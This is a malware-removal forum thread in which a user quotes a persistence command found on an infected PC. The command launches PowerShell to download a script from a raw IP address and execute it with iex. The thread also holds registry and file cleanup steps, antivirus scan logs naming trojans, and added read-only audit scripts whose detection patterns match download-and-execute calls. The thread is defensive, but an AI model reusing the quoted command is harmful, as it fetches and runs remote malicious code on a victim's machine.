
powershell.exe script running


5 replies to this topic

#1 hutchinson15


Posted 23 May 2015 - 09:26 PM

I am trying to clean an infection on a computer.  I have removed everything but this.  Every time I reboot, I get a PowerShell window open with a bunch of numbers in it.

 

cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -command "$a = New-Object System.Net.WebClient; $b = $a.DownloadString('http://37.228.88.167:80/landing?action=psf&pubid=0&subid=0&systemhash=1958591137'); iex $($ B)"

 

Has anyone run across this before?  I searched the forums and came across one but the topic was closed. http://www.bleepingcomputer.com/forums/t/574756/powershellexe-script-running/

 

I have run Malwarebytes and removed malware. I have also run RogueKiller to remove Poweliks.

 




#2 ransomwolf


Posted 24 May 2015 - 04:13 AM

Hey!

 

First let's attempt to remove the registry key that causes that PowerShell window to open:

 

1. Press the Windows key and the "R" key at the same time, and then type this in the window that opens: regedit


 

2. Windows registry editor will open. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, using the menu on the left. If you do not know how to use regedit, here's a guide. However, it's really simple and I doubt you need a guide :)

 

3. When you're there, on the right side of the screen, find the item whose "data" begins with cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, and right click and delete it!

If it's not there, please check if it's in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, and delete it.

Warning: only remove that item I mentioned! Don't delete anything that isn't in those two locations, and whose data doesn't start with cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe

 

Now the powershell shouldn't start when you boot the PC. However, your PC may still be infected.

You know how to run Malwarebytes, so please do a scan and remove the malware it finds. If it asks you to restart the PC, say "yes". Then, open Malwarebytes, select the "History" tab on the top, click the most recent "scan log", and on the window that opens, on the bottom, click "export --> copy to clipboard" and paste it here.


 

-------------------

Then, I want you to run a scan with HitmanPro. Here are the instructions:

 

1. Download Hitman Pro 32 bits if your OS is 32 bits or Hitman Pro 64 bits if your OS is 64 bits.

2. Run it. You should see this screen. Press next:


 

3. Select "no, I want to perform a one time scan to check this computer" and press "next":


 

4. After the scan completes (could take a while, since some suspicious files in your PC can get uploaded to the cloud for scanning), DON'T REMOVE ANYTHING YET! In the bottom left of the screen, click "Save log":


 

5. Close HitmanPro and please copy the log and post it here.


Edited by ransomwolf, 24 May 2015 - 08:16 AM.
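
The registry check from steps 1-3 above can also be done as a read-only listing, shown here as an added example that is not part of the original post. It covers the two Run keys named in the post and, going beyond it, the RunOnce keys and the 32-bit registry view; the key list, the match pattern, the function name and the sample strings are assumptions of this example, and it needs PowerShell 3.0 or later.

```powershell
# Added example (not from the thread): read-only audit of autostart registry values.
# Nothing is modified or deleted; review flagged entries by hand before removing them.

# The two keys named in the post, plus RunOnce and the 32-bit view (additions of this example).
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Heuristic (assumption of this example): a value that starts PowerShell and also
# contains a download-and-evaluate call or an encoded command.
$pattern = '(?i)powershell(\.exe)?\b.*(downloadstring|downloadfile|invoke-expression|\biex\b|-enc)'

function Get-RunKeyEntry {
    param([string[]]$Path)
    foreach ($key in $Path) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($name in $item.GetValueNames()) {
            # Keep %VARIABLES% unexpanded so the data is shown exactly as stored.
            $data = [string]$item.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
            [pscustomobject]@{
                Key        = $key
                Name       = $name
                Data       = $data
                Suspicious = ($data -match $pattern)
            }
        }
    }
}

# Constructed sample strings (not real registry data) to check the pattern offline.
# The first keeps the prefix quoted in the post; the command body is elided on purpose.
$sample = 'cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -command "... DownloadString(...); iex ..."'
$benign = '"C:\Program Files\Example\tray.exe" /background'
"Pattern self-check: sample flagged = $($sample -match $pattern); benign flagged = $($benign -match $pattern)"

# List every autostart value, flagged ones first.
Get-RunKeyEntry -Path $runKeys |
    Sort-Object Suspicious -Descending |
    Format-List Key, Name, Data, Suspicious
```

A flagged value is a lead for manual review, not a verdict; the HKLM keys may need an elevated prompt to read on some systems.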


#3 hutchinson15


Posted 24 May 2015 - 05:02 PM

Here is the malwarebytes log after I deleted the regedit file powershell.exe....

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/24/2015
Scan Time: 4:03:14 PM
Logfile:
Administrator: Yes

Version: 2.01.6.1022
Malware Database: v2015.05.24.03
Rootkit Database: v2015.05.16.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Duane

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 341752
Time Elapsed: 44 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Trojan.FakeVer.NSI, C:\Users\Duane\AppData\Roaming\3YDXZT8sF5RMnO9-j5yFh0P2lCARetV-E1aP6fcqFDXtuMk-y6KeTS83ZPbvrQh.exe, Quarantined, [b2c1534497f3af878399154b58aafe02],

Physical Sectors: 0
(No malicious items detected)

(end)

 

FYI this is the scan log from yesterday when I realized I had a huge problem. The poweliks malware was removed using roguekiller.

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/22/2015
Scan Time: 11:10:52 AM
Logfile:
Administrator: Yes

Version: 2.01.6.1022
Malware Database: v2015.05.22.03
Rootkit Database: v2015.05.16.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User:

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 348494
Time Elapsed: 29 min, 6 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 1
Trojan.Bunitu, C:\Users\Duane\AppData\Local\ntgislq.dll, Delete-on-Reboot, [67447521e1a9fc3a03ca0d0c976f9e62],

Registry Keys: 2
Trojan.Vawtrak, HKLM\SOFTWARE\CLASSES\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}, Quarantined, [2982672f4743bc7ab7ad05130105857b],
Trojan.Vawtrak, HKU\S-1-5-21-3780351661-4284392372-2404105391-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}, Quarantined, [2982672f4743bc7ab7ad05130105857b],

Registry Values: 1
Trojan.Bunitu, HKU\S-1-5-21-3780351661-4284392372-2404105391-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|ntgislq, rundll32 "C:\Users\Duane\AppData\Local\ntgislq.dll",ntgislq, Quarantined, [67447521e1a9fc3a03ca0d0c976f9e62]

Registry Data: 0
(No malicious items detected)

Folders: 1
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}, Delete-on-Reboot, [0d9e0a8cb0da73c3f377656bed16f60a],

Files: 21
Trojan.Bunitu, C:\Users\Duane\AppData\Local\ntgislq.dll, Delete-on-Reboot, [67447521e1a9fc3a03ca0d0c976f9e62],
Trojan.Vawtrak, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\acledit.dll, Delete-on-Reboot, [2982672f4743bc7ab7ad05130105857b],
Trojan.JobLaunch.ODB, C:\Users\Duane\AppData\Roaming\yfuygt.dll, Quarantined, [208be5b16d1dda5c73c6a6549071ea16],
Trojan.Agent.ED, C:\Users\Duane\AppData\Roaming\Mozilla\svchoste.exe, Quarantined, [fbb02e6891f93402752cfe5f946e9e62],
Trojan.Chrome.INJ, C:\Users\Duane\AppData\Local\Temp\uuruvat.dll, Quarantined, [ddce96004e3c1125570268a432d0bd43],
Trojan.CryptoLocker, C:\Users\Duane\AppData\Local\Temp\F16B.tmp, Quarantined, [0d9e6c2a6b1fc373f11dd9839a687789],
Trojan.Agent.PWN, C:\Users\Duane\AppData\Local\Temp\BDD0.tmp, Quarantined, [8328abebf991ef4773c8f140fe04718f],
Trojan.FakeVER.ED, C:\Users\Duane\AppData\Local\Temp\7FCB.tmp, Quarantined, [f0bb6333246687af89013f163ec4bb45],
Trojan.Agent.ED, C:\Users\Duane\AppData\Local\Temp\AD3B.tmp, Quarantined, [0f9c0492ee9cf0462d009485d82e2bd5],
Trojan.Agent.DED, C:\Users\Duane\AppData\Local\Temp\AC2A.tmp, Quarantined, [72390d896f1b6fc73e54708d09f8857b],
Trojan.Agent.ED, C:\Users\Duane\AppData\Local\Temp\F90C.tmp, Quarantined, [bcef0096e8a290a699087de0ba481ae6],
Trojan.Agent.ED, C:\Users\Duane\AppData\Local\Temp\CCF0.tmp, Quarantined, [bdee4a4c206ae650237eadb0c63c827e],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\8afc49b02429a, Delete-on-Reboot, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\acs.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\kakuog.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\kemgskmiq.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\oiosoauyg.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\oqm.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\qqkeaoigmm.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\qwsqqiwok.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\yeisi.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],

Physical Sectors: 0
(No malicious items detected)

(end)


Edited by hutchinson15, 24 May 2015 - 05:03 PM.


#4 hutchinson15


Posted 24 May 2015 - 05:13 PM

Here is the log from Hitman

 

 Scan date . . . . . . : 2015-05-24 16:54:54
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 16m 40s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No

   Threats . . . . . . . : 2
   Traces  . . . . . . . : 87

   Objects scanned . . . : 1,882,137
   Files scanned . . . . : 54,940
   Remnants scanned  . . : 630,606 files / 1,196,591 keys

Malware _____________________________________________________________________

   C:\Users\Duane\AppData\Local\Apps\2.0\E0LQT5V5.C4P\JZ4H7D3O.CN3\dell..tect_0f612f649c4a10af_0005.0007_none_78524b06fd68d189\DellSystemDetect.exe
      Size . . . . . . . : 254,976 bytes
      Age  . . . . . . . : 365.9 days (2014-05-23 20:09:53)
      Entropy  . . . . . : 6.7
      SHA-256  . . . . . : FA80EDD1B1C44E323D600F96F8893D6139373C57464905551D2900AE7FC39732
      Product  . . . . . : Dell System Detect
      Publisher  . . . . : Dell
      Description  . . . : Dell System Detect
      Version  . . . . . : 5.7.0.6
      LanguageID . . . . : 0
    > HitmanPro  . . . . : DellSystemDetectVuln
      Fuzzy  . . . . . . : 100.0

   C:\Users\Duane\AppData\Local\Apps\2.0\E0LQT5V5.C4P\JZ4H7D3O.CN3\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe
      Size . . . . . . . : 254,976 bytes
      Age  . . . . . . . : 365.9 days (2014-05-23 20:09:53)
      Entropy  . . . . . : 6.7
      SHA-256  . . . . . : FA80EDD1B1C44E323D600F96F8893D6139373C57464905551D2900AE7FC39732
      Product  . . . . . : Dell System Detect
      Publisher  . . . . : Dell
      Description  . . . : Dell System Detect
      Version  . . . . . : 5.7.0.6
      LanguageID . . . . : 0
    > HitmanPro  . . . . : DellSystemDetectVuln
      Fuzzy  . . . . . . : 100.0

Suspicious files ____________________________________________________________

   C:\Users\Duane\Desktop\FRST64.exe
      Size . . . . . . . : 2,108,416 bytes
      Age  . . . . . . . : 0.8 days (2015-05-23 20:43:03)
      Entropy  . . . . . : 7.5
      SHA-256  . . . . . : 18368D360E550098044037EBEC4BA93B8D98725B8EA03C89E9B0F3EADC5FC180
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.

Potential Unwanted Programs _________________________________________________

   ask.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Web Data




#5 ransomwolf


Posted 25 May 2015 - 07:56 AM

Hey,

 

Type "folder options" in the start menu, then go to "view", and untick "Hide extensions for known file types", and select "Show hidden files, folders and drives":

 


 

Then, please check if there are any .dll or .exe files in the root of these directories (not the subfolders!):

C:\Users\Duane\AppData\Roaming
C:\Users\Duane\AppData\Local
C:\Users\Duane\AppData\Roaming\Mozilla\

Note: You can press the "Windows" key and the "R" key, and then enter those directories, rather than going to them manually.

 

If you find any .dll or .exe files, delete them. Let me know if you find anything and/or have trouble deleting.

 

After that, download and run Temp File Cleaner by OldTimer. You just need to open it, and click the "start" button. If it asks you to reboot the PC, say "yes".


Edited by ransomwolf, 25 May 2015 - 08:16 AM.
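
The directory check described above can be done as a read-only inventory before anything is deleted, shown here as an added example that is not part of the original post. It assumes PowerShell 4.0 or later and that it runs as the affected user, so the environment variables resolve to the three directories listed; the function name and output columns are this example's own.

```powershell
# Added example (not from the thread): list .exe and .dll files sitting directly in
# the three profile directories from the post, without touching subfolders.
# Nothing is deleted; the output is meant to support a decision on each file.

$roots = @(
    $env:APPDATA,                          # ...\AppData\Roaming
    $env:LOCALAPPDATA,                     # ...\AppData\Local
    (Join-Path $env:APPDATA 'Mozilla')     # ...\AppData\Roaming\Mozilla
)

function Get-RootExecutable {
    param([string[]]$Directory)
    foreach ($dir in $Directory) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        # -Force includes hidden and system files; no -Recurse, so only the root is listed.
        Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.exe', '.dll' } |
            ForEach-Object {
                $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
                [pscustomobject]@{
                    Path      = $_.FullName
                    Created   = $_.CreationTime
                    Hidden    = [bool]($_.Attributes -band [IO.FileAttributes]::Hidden)
                    Signature = $sig.Status      # e.g. Valid, NotSigned, HashMismatch
                    SHA256    = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                }
            }
    }
}

# Newest files first: recently created, unsigned binaries deserve the first look.
Get-RootExecutable -Directory $roots |
    Sort-Object Created -Descending |
    Format-List Path, Created, Hidden, Signature, SHA256
```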


#6 hutchinson15


Posted 29 May 2015 - 02:38 PM

Thanks for your help. The computer seemed to be running okay the last I checked. It was my father's and I am no longer in the same town to do these last steps. When I am back that way I will try out these last steps and post something then if able. It will be 6 weeks from now though.

 

Thanks for your help so far!





